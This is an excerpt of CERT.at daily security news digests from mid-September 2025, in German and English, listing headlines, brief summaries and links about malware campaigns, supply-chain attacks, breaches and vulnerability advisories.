https://arstechnica.com/information-technology/2025/09/new-attack-on-chatgp… ∗∗∗ Threat landscape for industrial automation systems in Q2 2025 ∗∗∗ --------------------------------------------- Kaspersky industrial threat report contains statistics on various malicious objects detected and blocked on ICS computers by Kaspersky solutions in Q2 2025. --------------------------------------------- https://securelist.com/industrial-threat-report-q2-2025/117532/ ∗∗∗ How AI-Native Development Platforms Enable Fake Captcha Pages ∗∗∗ --------------------------------------------- Cybercriminals are abusing AI-native platforms like Vercel, Netlify, and Lovable to host fake captcha pages that deceive users, bypass detection, and drive phishing campaigns. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/i/ai-development-platforms-ena… ===================== = Vulnerabilities = ===================== ∗∗∗ Fortra Releases Critical Patch for CVSS 10.0 GoAnywhere MFT Vulnerability ∗∗∗ --------------------------------------------- Fortra has disclosed details of a critical security flaw in GoAnywhere Managed File Transfer (MFT) software that could result in the execution of arbitrary commands. The vulnerability, tracked as CVE-2025-10035, carries a CVSS score of 10.0, indicating maximum severity. "A deserialization vulnerability in the License Servlet of Fortra's GoAnywhere MFT allows an actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection," Fortra said in an advisory released Thursday. --------------------------------------------- https://thehackernews.com/2025/09/fortra-releases-critical-patch-for-cvss.h… ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (chromium, cjson, and firefox-esr), Fedora (expat, gh, scap-security-guide, and xen), Oracle (container-tools:rhel8, firefox, grub2, and mysql:8.4), SUSE (busybox, busybox-links, element-web, kernel, shadowsocks-v2ray-plugin, and yt-dlp), and Ubuntu (imagemagick, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-hwe-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-azure, linux-azure-5.15, linux-azure-fips, linux-ibm, linux-ibm-6.8, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-raspi, linux-oracle-6.8, linux-realtime, and openjpeg2). --------------------------------------------- https://lwn.net/Articles/1038802/ ∗∗∗ CISA Releases Nine Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- ICSA-25-261-01 Westermo Network Technologies WeOS 5, ICSA-25-261-02 Westermo Network Technologies WeOS 5, ICSA-25-261-03 Schneider Electric Saitel DR & Saitel DP Remote Terminal Unit, ICSA-25-261-04 Hitachi Energy Asset Suite, ICSA-25-261-05 Hitachi Energy Service Suite, ICSA-25-261-06 Cognex In-Sight Explorer and In-Sight Camera Firmware, ICSA-25-261-07 Dover Fueling Solutions ProGauge MagLink LX4 Devices --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/09/18/cisa-releases-nine-indus… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 18.09.2025
by Daily end-of-shift report 18 Sep '25

18 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 17-09-2025 18:00 − Donnerstag 18-09-2025 18:00 Handler: Guenes Holler Co-Handler: n/a ===================== = News = ===================== ∗∗∗ ShinyHunters claims 1.5 billion Salesforce records stolen in Drift hacks ∗∗∗ --------------------------------------------- The ShinyHunters extortion group claims to have stolen over 1.5 billion Salesforce records from 760 companies using compromised Salesloft Drift OAuth tokens. For the past year, the threat actors have been targeting Salesforce customers in data theft attacks using social engineering and malicious OAuth applications to breach Salesforce instances and download data. The stolen data is then used to extort companies into paying a ransom to prevent the data from being publicly leaked. --------------------------------------------- https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billi… ∗∗∗ SystemBC malware turns infected VPS systems into proxy highway ∗∗∗ --------------------------------------------- The operators of the SystemBC proxy botnet are hunting for vulnerable commercial virtual private servers (VPS) and maintain an average of 1,500 bots every day that provide a highway for malicious traffic. Compromised servers are located all over the world and have at least one unpatched critical vulnerability, some of them being plagued by tens of security issues. --------------------------------------------- https://www.bleepingcomputer.com/news/security/systembc-malware-turns-infec… ∗∗∗ Microsoft: Hacker konnten wohl beliebige Entra-ID-Tenants kapern ∗∗∗ --------------------------------------------- Der Sicherheitsforscher Dirk-Jan Mollema hat eine gefährliche Sicherheitslücke in der von vielen Unternehmen genutzten cloudbasierten Identitäts- und Zugriffsverwaltungsplattform Microsoft Entra ID entdeckt. Wie der Forscher in einem Blogbeitrag(öffnet im neuen Fenster) schildert, konnte er damit weltweit so ziemlich jeden Entra-ID-Tenant kompromittieren – mit Ausnahme nationaler Cloud-Deployments, die er lediglich mangels Zugriff nicht testen konnte. --------------------------------------------- https://www.golem.de/news/microsoft-hacker-konnten-wohl-beliebige-entra-id-… ∗∗∗ SilentSync RAT Delivered via Two Malicious PyPI Packages Targeting Python Developers ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that are designed to deliver a remote access trojan called SilentSync on Windows systems. --------------------------------------------- https://thehackernews.com/2025/09/silentsync-rat-delivered-via-two.html ∗∗∗ CountLoader Broadens Russian Ransomware Operations With Multi-Version Malware Loader ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered a new malware loader codenamed CountLoader that has been put to use by Russian ransomware gangs to deliver post-exploitation tools like Cobalt Strike and AdaptixC2, and a remote access trojan known as PureHVNC RAT. --------------------------------------------- https://thehackernews.com/2025/09/countloader-broadens-russian-ransomware.h… ∗∗∗ Phishing-Mails im Namen der Statistik Austria im Umlauf ∗∗∗ --------------------------------------------- Aktuell kursiert eine Phishing-E-Mail, die vorgibt, von der Statistik Austria zu stammen. In der Nachricht werden Unternehmen aufgefordert, sensible Finanz- und Geschäftsdaten (z. B. Listen ausländischer Geschäftspartner, Beträge, Zahlungsfristen) zu übermitteln. Es ist davon auszugehen, dass die Daten für gefälschte Geldforderungen an Geschäftspartner missbraucht werden könnten. --------------------------------------------- https://www.watchlist-internet.at/news/phishing-mails-im-namen-der-statisti… ∗∗∗ What We Know About the NPM Supply Chain Attack ∗∗∗ --------------------------------------------- On September 15, the Node Package Manager (NPM) repository experienced an ongoing supply chain attack, in which the attackers executed a highly targeted phishing campaign to compromise the account of an NPM package maintainer. With privileged access, the attackers injected malicious code into widely used JavaScript packages, threatening the entire software ecosystem. Notably, the attack has disrupted several key NPM packages, including those integral to application development and cryptography. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/i/npm-supply-chain-attack.html ∗∗∗ New Raven Stealer Malware Hits Browsers for Passwords and Payment Data ∗∗∗ --------------------------------------------- New research reveals Raven Stealer malware that targets browsers like Chrome and Edge to steal personal data. Learn how this threat uses simple tricks like process hollowing to evade antiviruses and why it’s a growing risk for everyday users. --------------------------------------------- https://hackread.com/raven-stealer-malware-browsers-passwords-payment-data/ ∗∗∗ Vane Viper Malvertising Network Posed as Legit Adtech in Global Scams ∗∗∗ --------------------------------------------- Cybersecurity firm Infoblox says it has discovered “Vane Viper,” a massive online ad network that posed as a legitimate business while running global scams and spreading malware. Linked to previously reported PropellerAds and its parent company AdTech Holding, the operation has been active for nearly a decade and is now being called one of the largest malvertising scams seen to date. --------------------------------------------- https://hackread.com/vane-viper-malvertising-adtech-global-scams/ ===================== = Vulnerabilities = ===================== ∗∗∗ Notfallpatch: Aktiv ausgenutzte Chrome-Lücke gefährdet unzählige Nutzer ∗∗∗ --------------------------------------------- Google hat einen Notfallpatch für seinen weit verbreiteten Webbrowser Chrome bereitgestellt. Damit schließt der Konzern gleich mehrere gefährliche Sicherheitslücken. Eine davon wird bereits aktiv ausgenutzt, wie aus den Release Notes(öffnet im neuen Fenster) hervorgeht. Anwender sollten den Browser daher zügig aktualisieren, um sich vor möglichen Angriffen zu schützen. Betroffen sind Chrome-Versionen für Windows, Mac und Linux. --------------------------------------------- https://www.golem.de/news/notfallpatch-aktiv-ausgenutzte-chrome-luecke-gefa… ∗∗∗ Schwachstellen bedrohen HPE Aruba Networking EdgeConnect SD-WAN ∗∗∗ --------------------------------------------- Angreifer können Wide Area Networks (WAN) attackieren, die auf HPE Aruba Networking EdgeConnect SD-WAN fußen. Die Entwickler haben jüngst mehrere Sicherheitslücken geschlossen. Nach erfolgreichen Attacken können Angreifer unter anderem Sicherheitsbeschränkungen umgehen oder sogar Schadcode ausführen, um Systeme vollständig zu kompromittieren. --------------------------------------------- https://www.heise.de/news/Schwachstellen-bedrohen-HPE-Aruba-Networking-Edge… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (gnutls, mysql:8.4, opentelemetry-collector, and python-cryptography), Debian (nextcloud-desktop), Fedora (chromium, firefox, forgejo, gitleaks, kernel, kernel-headers, lemonldap-ng, perl-Cpanel-JSON-XS, and python-pip), Red Hat (firefox and libxml2), Slackware (expat and mozilla), SUSE (avahi, bluez, cups, curl, firefox-esr, gdk-pixbuf, gstreamer, java-1_8_0-ibm, krb5, net-tools, podman, raptor, sevctl, tkimg, ucode-intel, and vim), and Ubuntu (linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-fips, linux-azure-fips, linux-gcp-fips, and linux-gcp-6.14, linux-oracle, linux-oracle-6.14). --------------------------------------------- https://lwn.net/Articles/1038638/ ∗∗∗ Open-Source Tool Greenshot Hit by Severe Code Execution Vulnerability ∗∗∗ --------------------------------------------- A security vulnerability has been discovered in Greenshot, the widely used open-source screenshot tool for Windows. The Greenshot vulnerability exposes to the risk of arbitrary code execution, potentially allowing attackers to bypass established security protocols and launch further malicious activities. A proof-of-concept (PoC) exploit has already been released, drawing attention to the critical nature of the vulnerability. --------------------------------------------- https://thecyberexpress.com/greenshot-vulnerability/ ∗∗∗ ENCS testers help resolve critical vulnerabilities in solar inverters ∗∗∗ --------------------------------------------- ENCS cybersecurity testers uncovered several vulnerabilities in consumer solar inverters widely used in Europe, as part of the work on consumer IoT equipment. We reported these to the Dutch Institute for Vulnerability Disclosure (DIVD) CSIRT to start a responsible vulnerability disclosure process. Six vulnerabilities have now been resolved by the manufacturers. --------------------------------------------- https://encs.eu/news/encs-testers-help-resolve-critical-vulnerabilities-in-… ∗∗∗ ZDI-25-895: Wondershare Repairit Incorrect Permission Assignment Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-25-895/ ∗∗∗ CVE-2025-9242: WatchGuard Firebox iked Out of Bounds Write Vulnerability ∗∗∗ --------------------------------------------- https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015 ∗∗∗ Third-Party Libraries and Supply Chains - PSA-2025-09-17 ∗∗∗ --------------------------------------------- https://www.drupal.org/psa-2025-09-17 ∗∗∗ Daikin Security Gateway ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-25-254-10 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 17.09.2025
by Daily end-of-shift report 17 Sep '25

17 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 16-09-2025 18:00 − Mittwoch 17-09-2025 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs ===================== = News = ===================== ∗∗∗ From ClickFix to MetaStealer: Dissecting Evolving Threat Actor Techniques ∗∗∗ --------------------------------------------- ClickFix isnt just back—its mutating. New variants use fake CAPTCHAs, File Explorer tricks & MSI lures to drop MetaStealer. Stay ahead with Huntress Tradecraft Tuesday threat briefings. --------------------------------------------- https://www.bleepingcomputer.com/news/security/from-clickfix-to-metastealer… ∗∗∗ Critical Bugs in Chaos Mesh Enable Cluster Takeover ∗∗∗ --------------------------------------------- "Chaotic Deputy" is a set of four vulnerabilities in the chaos engineering platform that many organizations use to test the resilience of their Kubernetes environments. Such is the case with a set of four serious vulnerabilities that researchers at JFrog recently discovered in Chaos Mesh that give attackers a way to take over entire Kubernetes clusters. --------------------------------------------- https://www.darkreading.com/cyber-risk/critical-bugs-chaos-mesh-cluster-tak… ∗∗∗ GOLD SALEM’s Warlock operation joins busy ransomware landscape ∗∗∗ --------------------------------------------- Counter Threat Unit (CTU) researchers are monitoring a threat group that refers to itself as Warlock Group. The group, which CTU researchers track as GOLD SALEM, has compromised networks and deployed its Warlock ransomware since March 2025. --------------------------------------------- https://news.sophos.com/en-us/2025/09/17/gold-salems-warlock-operation-join… ∗∗∗ Scattered Spider Resurfaces With Financial Sector Attacks Despite Retirement Claims ∗∗∗ --------------------------------------------- Cybersecurity researchers have tied a fresh round of cyber attacks targeting financial services to the notorious cybercrime group known as Scattered Spider, casting doubt on their claims of going "dark". Threat intelligence firm ReliaQuest said it has observed indications that the threat actor has shifted their focus to the financial sector. --------------------------------------------- https://thehackernews.com/2025/09/scattered-spider-resurfaces-with.html ∗∗∗ Microsoft seizes 338 websites to disrupt rapidly growing ‘RaccoonO365’ phishing service ∗∗∗ --------------------------------------------- Microsoft’s Digital Crimes Unit (DCU) has disrupted RaccoonO365, the fastest-growing tool used by cybercriminals to steal Microsoft 365 usernames and passwords (“credentials”). --------------------------------------------- https://blogs.microsoft.com/on-the-issues/2025/09/16/microsoft-seizes-338-w… ∗∗∗ Ransomware HybridPetya hebelt UEFI Secure Boot aus ∗∗∗ --------------------------------------------- ESET Research hat HybridPetya auf der Sample-Sharing-Plattform VirusTotal entdeckt. Es handelt sich um einen Nachahmer der berüchtigten Petya/NotPetya-Malware, der zusätzlich die Fähigkeit besitzt, UEFI-basierte Systeme zu kompromittieren und CVE-2024-7344 als Waffe einzusetzen, um UEFI Secure Boot auf veralteten Systemen zu umgehen. --------------------------------------------- https://www.welivesecurity.com/de/eset-research/ransomware-hybridpetya-hebe… ∗∗∗ Myth Busting: Why "Innocent Clicks" Dont Exist in Cybersecurity ∗∗∗ --------------------------------------------- Unit 42 explores how innocent clicks can have serious repercussions. Learn how simply visiting a malicious site can expose users to significant digital dangers. --------------------------------------------- https://unit42.paloaltonetworks.com/why-innocent-clicks-dont-exist-in-cyber… ∗∗∗ Der npm-Angriff geht weiter – "Wurm" infiziert Pakete ∗∗∗ --------------------------------------------- Der Lieferkettenangriff auf ein npm-Entwicklerkonto und 18 kompromittierten Paketen schien glimpflich ausgegangen zu sein. Jetzt wird bekannt, dass die Angriffe (über ein anderes Konto) weitergehen und eine selbstreplizierende Malware (Shai-Hulud) bereits mehr als 500 npm-Pakete infiziert hat. --------------------------------------------- https://www.borncity.com/blog/2025/09/17/der-npm-angriff-geht-weiter-wurm-i… ∗∗∗ PyPI Token Exfiltration Campaign via GitHub Actions Workflows ∗∗∗ --------------------------------------------- I recently responded to an attack campaign where malicious actors injected code into GitHub Actions workflows attempting to steal PyPI publishing tokens. PyPI was not compromised, and no PyPI packages were published by the attackers. --------------------------------------------- https://blog.pypi.org/posts/2025-09-16-github-actions-token-exfiltration/ ∗∗∗ Ongoing Supply Chain Attack Targets CrowdStrike npm Packages ∗∗∗ --------------------------------------------- Socket detected multiple compromised CrowdStrike npm packages, continuing the "Shai-Halud" supply chain attack that has now impacted nearly 500 packages. --------------------------------------------- https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm… ∗∗∗ Microsoft: Office 2016 and Office 2019 reach end of support next month ∗∗∗ --------------------------------------------- Microsoft reminded customers again this week that Office 2016 and Office 2019 will reach the end of extended support in less than 30 days, on October 14, 2025. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-office-2016-and-o… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (container-tools:rhel8, kernel, and podman), Debian (node-sha.js), Fedora (firefox, kea, and perl-JSON-XS), Mageia (java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-latest-openjdk), Oracle (kernel, libarchive, podman, and python-cryptography), Red Hat (multiple packages, mysql:8.4, and python3.11), SUSE (expat, java-1_8_0-ibm, krb5, libavif, net-tools, nginx, nvidia-open-driver-G06-signed, onefetch, pcp, rabbitmq-server313, raptor, and vim), and Ubuntu (libyang2, linux, linux-aws, linux-aws-5.4, linux-bluefield, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-iot, linux-kvm, linux-raspi, linux-raspi-5.4, linux-xilinx-zynqmp, linux-aws-fips, linux-fips, linux-gcp-fips, and python-xmltodict). --------------------------------------------- https://lwn.net/Articles/1038453/ ∗∗∗ CISA Releases Eight Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- CISA released eight Industrial Control Systems (ICS) advisories on September 16, 2025. The following products are affected, Schneider Electric Altivar Products, Schneider Electric ATVdPAC Module, Schneider Electric ILC992 InterLink Converter, Schneider Electric Galaxy VS, Schneider Electric Galaxy VL, Schneider Electric Galaxy VXL, Hitachi Energy RTU500 Series, Siemens SIMATIC NET CP, Siemens SINEMA, Siemens SCALANCE, Siemens RUGGEDCOM, Siemens SINEC NMS, Siemens Industrial Products (OpenSSL Vulnerability), Siemens Multiple Industrial Products and Delta Electronics DIALink. --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/09/16/cisa-releases-eight-indu… ∗∗∗ CVE-2025-9708: Kubernetes C# Client, improper certificate validation in custom CA mode may lead to man-in-the-middle attacks ∗∗∗ --------------------------------------------- https://github.com/kubernetes/kubernetes/issues/134063 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 16.09.2025
by Daily end-of-shift report 16 Sep '25

16 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Montag 15-09-2025 18:00 − Dienstag 16-09-2025 18:00 Handler: Felician Fuchs Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Neuer NPM-Großangriff: Selbst-vermehrende Malware infiziert Dutzende Pakete ∗∗∗ --------------------------------------------- Verschiedene IT-Sicherheitsunternehmen warnen vor neuen Angriffen auf das npm-Ökosystem rund um node.js. Mehrere Dutzend Pakete (mindestens 40, in einem Bericht gar an die 150) sind mit einer Malware infiziert, die geheime Daten stiehlt und über einen Webhook ausleitet. Zudem repliziert sich die Schadsoftware selbsttätig – und ist somit ein Wurm. [..] Unklar ist noch, wo der Angriff begann – einen klaren "Patient Null" nennen die drei analysierenden Unternehmen nicht. [..] JavaScript-Entwickler und insbesondere die Verwalter von auf npm gehosteten Paketen sollten größte Vorsicht walten lassen und die umfangreiche Liste infizierter Pakete konsultieren. --------------------------------------------- https://heise.de/-10651111 ∗∗∗ Apple backports zero-day patches to older iPhones and iPads ∗∗∗ --------------------------------------------- Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks. This security flaw is the same one Apple has patched for devices running iOS 18.6.2 and iPadOS 18.6.2, iPadOS 17.7.10, and macOS (Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8) on August 20. --------------------------------------------- https://www.bleepingcomputer.com/news/security/apple-backports-zero-day-pat… ∗∗∗ Patchstatus unklar: Angreifer attackieren Fertigungsmanagementtool DELMIA Apriso ∗∗∗ --------------------------------------------- DELMIA Apriso ist eine Manufacturing-Operations-Management-Software (MOM) und ein Manufacturing Execution System (MES) [..] Der Anbieter der Software, Dassault Systèmes, erwähnte die Sicherheitslücke (CVE-2025-5086 "kritisch") bereits im Juni dieses Jahres in einer äußerst knapp formulierten Warnmeldung. [..] Anfang September warnte nun ein Sicherheitsforscher des SANS-Institut Internet Strom Center in einem Beitrag vor Exploitversuchen. [..] Unklar bleibt auch, ob es einen Sicherheitspatch gibt. --------------------------------------------- https://www.heise.de/news/Patchstatus-unklar-Attacken-auf-Fertigungsmanagem… ∗∗∗ IServ: Schullösung mit Schwäche inbegriffen? ∗∗∗ --------------------------------------------- Am 8. September 2025 ist jemandem aufgefallen, dass das Web-Frontend des IServ-Schul-Servers der IServ GmbH eine "Benutzeraufzählung" im weitesten Sinne ermöglicht. Gibt jemand den Namen einer Person an der IServ-Anmeldeseite einer Schule ein, und versucht er eine Anmeldung, ohne das Passwort zu kennen, schlägt diese Anmeldung natürlich fehl. Noch ist also alles im grünen Bereich, da dieser Anmeldeversuch abgewiesen wird. Das Problem liegt darin, dass sich die Antworten dieser fehlgeschlagenen Anmeldeversuche unterscheiden, nachdem, ob das Benutzerkonto existiert oder nicht und hängt angeblich noch von anderen Bedingungen ab. --------------------------------------------- https://www.borncity.com/blog/2025/09/16/iserve-schulloesung-mit-schwaeche-… ∗∗∗ Microsoft: Exchange 2016 and 2019 reach end of support in 30 days ∗∗∗ --------------------------------------------- Microsoft has reminded administrators again that Exchange 2016 and Exchange 2019 will reach the end of extended support next month and has provided guidance for decommissioning outdated servers. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-2016-and… ∗∗∗ Phoenix: Neue Rowhammer-Variante verleiht Angreifern Root-Rechte ∗∗∗ --------------------------------------------- Forscher von Google und der ETH Zürich haben eine neue Variante des Rowhammer-Angriffs vorgestellt. Sie betrifft auch moderne DDR5-RAM-Module, die eigentlich vor entsprechenden Attacken geschützt sein sollten. [..] Die Phoenix genannte Angriffstechnik greift laut Informationsseite der Entdecker(öffnet im neuen Fenster) auf eine Schwachstelle bei den Rowhammer-Abwehrmaßnahmen zurück, die bestimmte Refresh-Intervalle des Speichers nicht abdecken. --------------------------------------------- https://www.golem.de/news/phoenix-neue-rowhammer-variante-verleiht-angreife… ∗∗∗ RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT ∗∗∗ --------------------------------------------- Kaspersky GReAT expert takes a closer look at the RevengeHotels threat actors new campaign, including AI-generated scripts, targeted phishing, and VenomRAT. --------------------------------------------- https://securelist.com/revengehotels-attacks-with-ai-and-venomrat-across-la… ∗∗∗ New FileFix Variant Delivers StealC Malware Through Multilingual Phishing Site ∗∗∗ --------------------------------------------- Cybersecurity researchers have warned of a new campaign that's leveraging a variant of the FileFix social engineering tactic to deliver the StealC information stealer malware. "The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection," Acronis security researcher Eliad Kimhy said in a report shared with The Hacker News. --------------------------------------------- https://thehackernews.com/2025/09/new-filefix-variant-delivers-stealc.html ∗∗∗ SmokeLoader Rises From the Ashes ∗∗∗ --------------------------------------------- Active since 2011, SmokeLoader (aka Smoke or Dofoil) is a popular malware loader that is designed to deliver second-stage payloads such as trojans, ransomware, and information stealers. [..] In May 2024, Operation Endgame, an international collaboration between law enforcement and private industry (which included Zscaler ThreatLabz) dismantled numerous instances of SmokeLoader and remotely removed the malware from infected systems. [..] ThreatLabz has identified two new SmokeLoader versions that are being used by multiple threat groups. --------------------------------------------- https://www.zscaler.com/blogs/security-research/smokeloader-rises-ashes ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (kernel and kernel-rt), Debian (node-sha.js and python-django), Fedora (chromium, cups, exiv2, perl-Catalyst-Authentication-Credential-HTTP, perl-Catalyst-Plugin-Session, perl-Plack-Middleware-Session, and qemu), Red Hat (container-tools:rhel8, podman, and udisks2), SUSE (cargo-audit, cargo-c, cargo-packaging, and kernel-devel), and Ubuntu (libcpanel-json-xs-perl, libjson-xs-perl, rubygems, sqlite3, and vim). --------------------------------------------- https://lwn.net/Articles/1038325/ ∗∗∗ Spring Security and Spring Framework Release Fixes for CVE-2025-41248 and CVE-2025-41249 ∗∗∗ --------------------------------------------- https://spring.io/blog/2025/09/15/spring-framework-and-spring-security-fixe… ∗∗∗ LG WebOS TV Path Traversal, Authentication Bypass and Full Device Takeover ∗∗∗ --------------------------------------------- https://ssd-disclosure.com/lg-webos-tv-path-traversal-authentication-bypass… ∗∗∗ Mozilla Security Advisories September 16, 2025 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/ ∗∗∗ TYPO3-EXT-SA-2025-013: Vulnerability in bundled package in extension "Base Excel" (base_excel) ∗∗∗ --------------------------------------------- https://typo3.org/security/advisory/typo3-ext-sa-2025-013 ∗∗∗ TYPO3-EXT-SA-2025-012: Cross-Site Scripting in extension "Form to Database" (form_to_database) ∗∗∗ --------------------------------------------- https://typo3.org/security/advisory/typo3-ext-sa-2025-012 ∗∗∗ Synology-SA-25:11 Safe Access ∗∗∗ --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_25_11 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 15.09.2025
by Daily end-of-shift report 15 Sep '25

15 Sep '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 12-09-2025 18:00 − Montag 15-09-2025 18:00 Handler: Felician Fuchs Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Microsoft reminds of Windows 10 support ending in 30 days ∗∗∗ --------------------------------------------- On Friday, Microsoft reminded customers once again that Windows 10 will reach its end of support in 30 days, on October 14. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-reminds-of-window… ∗∗∗ Shiny tools, shallow checks: how the AI hype opens the door to malicious MCP servers ∗∗∗ --------------------------------------------- Kaspersky experts discuss the Model Context Protocol used for AI integration. We describe the MCPs architecture, attack vectors and follow a proof of concept to see how it can be abused. --------------------------------------------- https://securelist.com/model-context-protocol-for-ai-integration-abused-in-… ∗∗∗ A Cyberattack Victim Notification Framework ∗∗∗ --------------------------------------------- When cyber incidents occur, victims should be notified in a timely manner so they have the opportunity to assess and remediate any harm. However, providing notifications has proven a challenge across industry. --------------------------------------------- https://www.schneier.com/blog/archives/2025/09/a-cyberattack-victim-notific… ∗∗∗ Lawsuit About WhatsApp Security ∗∗∗ --------------------------------------------- Attaullah Baig, WhatsApp’s former head of security, has filed a whistleblower lawsuit alleging that Facebook deliberately failed to fix a bunch of security flaws, in violation of its 2019 settlement agreement with the Federal Trade Commission. --------------------------------------------- https://www.schneier.com/blog/archives/2025/09/lawsuit-about-whatsapp-secur… ∗∗∗ FBI Warns of UNC6040 and UNC6395 Targeting Salesforce Platforms in Data Theft Attacks ∗∗∗ --------------------------------------------- The U.S. Federal Bureau of Investigation (FBI) has issued a flash alert to release indicators of compromise (IoCs) associated with two cybercriminal groups tracked as UNC6040 and UNC6395 for a string of data theft and extortion attacks. "Both groups have recently been observed targeting organizations Salesforce platforms via different initial access mechanisms," the FBI said. --------------------------------------------- https://thehackernews.com/2025/09/fbi-warns-of-unc6040-and-unc6395.html ∗∗∗ All your vulns are belong to us! CISA wants to maintain gov control of CVE program ∗∗∗ --------------------------------------------- Get ready for a fight over who steers the global standard for vulnerability identification The Cybersecurity and Infrastructure Security Agency (CISA) nearly let the Common Vulnerabilities and Exposures (CVE) program lapse earlier this year, but a new "vision" document it released this week signals that it now wants more control over the global standard for vulnerability identification. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2025/09/12/cisas_vision… ∗∗∗ Docker Image Security – Teil 2: Minimale und sichere Docker Images ∗∗∗ --------------------------------------------- Distroless Images reduzieren Paketgrößen drastisch, indem sie unnötige Komponenten wie Bash und Paketmanager weglassen. Das erhöht Performance und Sicherheit. --------------------------------------------- https://www.heise.de/hintergrund/Docker-Image-Security-Teil-2-Minimale-und-… ∗∗∗ Cyberkriminelle: "Scattered Lapsus$ Hunters" haben keine Lust mehr ∗∗∗ --------------------------------------------- Die Bande machte zuletzt durch Cyberangriffe auf Jaguar und Marks & Spencer von sich reden, die immense Schäden verursachten. Nicht alle halten die Füße still. --------------------------------------------- https://www.heise.de/news/Cybergang-Scattered-Lapsus-Hunters-kuendigt-Absch… ∗∗∗ Angreifer können IT-Sicherheitslösung IBM QRadar SIEM lahmlegen ∗∗∗ --------------------------------------------- Verschiedene Komponenten in IBMs IT-Sicherheitslösung QRadar SIEM sind verwundbar. Nutzen Angreifer die Schwachstellen erfolgreich aus, können sie unter anderem DoS-Zustände erzeugen, sodass Dienste abstürzen. Fällt dadurch der eigentlich durch die Anwendung versprochene Schutz weg, kann das fatale Folgen haben. --------------------------------------------- https://www.heise.de/news/Angreifer-koennen-IT-Sicherheitsloesung-IBM-QRada… ∗∗∗ Trusted Connections, Hidden Risks: Token Management in the Third-Party Supply Chain ∗∗∗ --------------------------------------------- Effective OAuth token management is crucial for supply chain security, preventing breaches caused by dormant integrations, insecure storage or lack of rotation. --------------------------------------------- https://unit42.paloaltonetworks.com/third-party-supply-chain-token-manageme… ∗∗∗ npm-Hack: Angreifer schauen weitgehend in die Röhre ∗∗∗ --------------------------------------------- Es war zwar ein Desaster im Hinblick auf die Kompromittierung einer Lieferkette – der Hack eines npm-Entwicklerkontos samt Injektion von Schadcode. Der Angreifer scheint aber mit ziemlich leeren Händen aus der Sache rausgegangen zu sein – er soll, je nach Quelle zwischen 65 und 600 US-Dollar an Kryptogeld gestohlen haben. --------------------------------------------- https://www.borncity.com/blog/2025/09/14/npm-hack-angreifer-schauen-weitgeh… ∗∗∗ New VoidProxy Phishing Service Bypasses MFA on Microsoft and Google Accounts ∗∗∗ --------------------------------------------- Okta Threat Intelligence exposes VoidProxy, a new PhaaS platform. Learn how this advanced service uses the Adversary-in-the-Middle technique to bypass MFA and how to protect yourself from attacks targeting Microsoft and Google accounts. --------------------------------------------- https://hackread.com/voidproxy-phishing-service-bypasses-mfa-microsoft-goog… ∗∗∗ Qrator Labs Mitigated Record L7 DDoS Attack from 5.76M-Device Botnet ∗∗∗ --------------------------------------------- Qrator Labs blocked a record L7 DDoS attack from a 5.76M-device botnet targeting government systems, showing rapid global growth since March. --------------------------------------------- https://hackread.com/qrator-labs-mitigate-l7-ddos-attack-5-76m-botnet/ ∗∗∗ 600 GB of Alleged Great Firewall of China Data Published in Largest Leak Yet ∗∗∗ 